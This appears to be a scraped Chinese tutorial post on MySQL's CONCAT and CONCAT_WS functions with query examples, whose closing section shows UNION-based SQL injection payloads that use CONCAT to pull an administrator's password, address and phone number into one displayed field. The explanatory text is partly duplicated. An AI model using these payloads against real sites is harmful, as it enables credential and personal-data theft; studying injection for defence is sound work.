concat() mysql 多个字段拼接
2016-01-04 14:38
621 查看
语法:
COUNT(DISTINCT expr ,[expr ...])
函数使用说明:返回不同的非NULL 值数目。若找不到匹配的项,则COUNT(DISTINCT) 返回 0
Mysql的查询结果行字段拼接,可以用下面两个函数实现:
1. concat函数
如果连接串中存在NULL,则返回结果为NULL:
2. concat_ws函数
concat(separator,str1,str2,...) 代表 concat with separator ,是concat()的特殊形式。第一个参数是其它参数的分隔符。分隔符的位置放在要连接的两个字符串之间。分隔符可以是一个字符串,也可以是其它参数。
分隔符为NULL,则返回结果为NULL:
如果参数中存在NULL,则会被忽略:
可以对NULL进行判断,并用其它值进行替换:
concat的SQL注入:
上面的user_id是接收输入的。
concat函数本来是这样用的SELECT CONCAT('My', 'S', 'QL');执行结果是'MySQL'。也就是连接作用的。我们利用它来为我们服务,
这个语句实际查询了六个字段,但是显示的时候,把password,sex,address,telephone等字段合在一起,显示在原本应该显示email的地方。
更好的方法:中间用分隔符分开:
其中0×3a是“:”的十六进 制形式。
COUNT(DISTINCT expr ,[expr ...])
函数使用说明:返回不同的非NULL 值数目。若找不到匹配的项,则COUNT(DISTINCT) 返回 0
Mysql的查询结果行字段拼接,可以用下面两个函数实现:
1. concat函数
mysql> select concat('1','2','3') from test ;
+---------------------+
| concat('1','2','3') |
+---------------------+
| 123 |
+---------------------+如果连接串中存在NULL,则返回结果为NULL:
mysql> select concat('1','2',NULL,'3') from test ;
+--------------------------+
| concat('1','2',NULL,'3') |
+--------------------------+
| NULL |
+--------------------------+2. concat_ws函数
concat(separator,str1,str2,...) 代表 concat with separator ,是concat()的特殊形式。第一个参数是其它参数的分隔符。分隔符的位置放在要连接的两个字符串之间。分隔符可以是一个字符串,也可以是其它参数。
mysql> select concat_ws(':','1','2','3') from test ;
+----------------------------+
| concat_ws(':','1','2','3') |
+----------------------------+
| 1:2:3 |
+----------------------------+分隔符为NULL,则返回结果为NULL:
mysql> select concat_ws(NULL,'1','2','3') from test; +-----------------------------+ | concat_ws(NULL,'1','2','3') | +-----------------------------+ | NULL | +-----------------------------+
如果参数中存在NULL,则会被忽略:
mysql> select concat_ws(':','1','2',NULL,NULL,NULL,'3') from test ;
+-------------------------------------------+
| concat_ws(':','1','2',NULL,NULL,NULL,'3') |
+-------------------------------------------+
| 1:2:3 |
+-------------------------------------------+可以对NULL进行判断,并用其它值进行替换:
mysql> select concat_ws(':','1','2',ifNULL(NULL,'0'),'3') from bank limit 1;
+---------------------------------------------+
| concat_ws(':','1','2',ifNULL(NULL,'0'),'3') |
+---------------------------------------------+
| 1:2:0:3 |
+---------------------------------------------+concat的SQL注入:
select username,email,content from test_table where user_id=uid;
上面的user_id是接收输入的。
concat函数本来是这样用的SELECT CONCAT('My', 'S', 'QL');执行结果是'MySQL'。也就是连接作用的。我们利用它来为我们服务,
uid=-1 union select username ,concat(password,sex,address,telephone),content from test_talbe where user_id=管理员id;
这个语句实际查询了六个字段,但是显示的时候,把password,sex,address,telephone等字段合在一起,显示在原本应该显示email的地方。
更好的方法:中间用分隔符分开:
uid=-1 union select username ,concat(password,0×3a,sex,0×3a,address,0×3a,telephone) ,content from test_talbe where user_id=管理员id;
其中0×3a是“:”的十六进 制形式。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 关于DOS界面net start MySQL 启动失败的解决办法
- MySql安装种种
- Mysql 里CHAR和VARCHAR的最大长度及一些注意事项
- 解决mysql max_allowed_packet 太小 造成的程序查询数据报错问题
- mysql中char(n)和varchar(n)在数据存入的时候关于是否丢弃最后的空格的区别
- mysql自带的字符串相关函数
- MySQL 5.7 zip安装
- 批量修改MySQL列级别字符排序方式为utf8
- mysql排序
- Mysql进程管理
- MySQL之——Union
- mysql explain用法
- [转]MySQL 5.7 新特性大全和未来展望
- MySql ERROR 1205:Lock wait timeout exceeded; try restarting transaction
- group_concat mysql 把结果集中的一列数据用指定分隔符转换成一行
- MySql中添加用户,新建数据库,用户授权,删除用户,修改密码
- Mysql table ful
- MySQL Index详解
- Mysql 命令大全
- MySql错误1045 Access denied for user 'root'@'localhost' (using password:YES) windows下的解决方案(忘记密码)